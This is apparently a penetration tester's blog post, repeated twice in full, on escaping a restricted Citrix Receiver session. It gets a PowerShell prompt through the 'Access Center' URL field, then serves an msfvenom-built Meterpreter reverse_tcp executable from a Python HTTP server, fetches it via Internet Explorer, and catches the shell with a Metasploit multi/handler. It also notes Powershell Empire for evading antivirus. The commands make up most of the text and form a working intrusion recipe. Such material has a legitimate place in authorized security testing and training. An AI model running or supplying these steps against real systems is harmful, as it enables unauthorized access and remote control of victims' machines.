Escaping Citrix Environment

Once you’re in Citrix Receiver you’d like to get a command line. Often domain admins disable access to cmd but they forget about powershell.

There’re different ways to get what you want:

Does it still work? Yes, it does!

Screenshot from 2016-07-08 14-33-08.png

Then go to the link called “Access Center” and type in a URL field: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

Screenshot from 2016-07-08 14-35-55.png

Press enter and get your shell:

Screenshot from 2016-07-08 14-40-20.png

Uploading meterpreter

I had to download meterpreter (some say that it’s better to use Powershell Empire because it can avoid AVs) so I started a simple http server using python:

python -m http.server 80

To generate payload use msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp  lhost=10.0.128.55 lport=4444 -f exe -o exploit.exe

To know which arch we have on the remote host we can use the following variable:

$ENV:PROCESSOR_ARCHITECTURE

Create a handler on the attacker’s machine:

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <local ip>

Then we start IE to download our payload:

Invoke-Item "C:\Program Files\Internet Explorer\iexplore.exe"

But it loads only start page and I was not able to change its behaviour (if you know how I’d like to know so email me in that case:). So instead of the previous command I could use the following:

Start-Process <URL>

It starts IE and goes to the URL. We download the payload and it gives us meterpreter shell.

Then we could use background command to send our shell into the background and use some exploits or whatever. To get back to the session use sessions -i <number>

Once you’re in Citrix Receiver you’d like to get a command line. Often domain admins disable access to cmd but they forget about powershell.

There’re different ways to get what you want:

Does it still work? Yes, it does!

Screenshot from 2016-07-08 14-33-08.png

Then go to the link called “Access Center” and type in a URL field: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

Screenshot from 2016-07-08 14-35-55.png

Press enter and get your shell:

Screenshot from 2016-07-08 14-40-20.png

Uploading meterpreter

I had to download meterpreter (some say that it’s better to use Powershell Empire because it can avoid AVs) so I started a simple http server using python:

python -m http.server 80

To generate payload use msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp  lhost=10.0.128.55 lport=4444 -f exe -o exploit.exe

To know which arch we have on the remote host we can use the following variable:

$ENV:PROCESSOR_ARCHITECTURE

Create a handler on the attacker’s machine:

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <local ip>

Then we start IE to download our payload:

Invoke-Item "C:\Program Files\Internet Explorer\iexplore.exe"

But it loads only start page and I was not able to change its behaviour (if you know how I’d like to know so email me in that case:). So instead of the previous command I could use the following:

Start-Process <URL>

It starts IE and goes to the URL. We download the payload and it gives us meterpreter shell.

Then we could use background command to send our shell into the background and use some exploits or whatever. To get back to the session use sessions -i <number>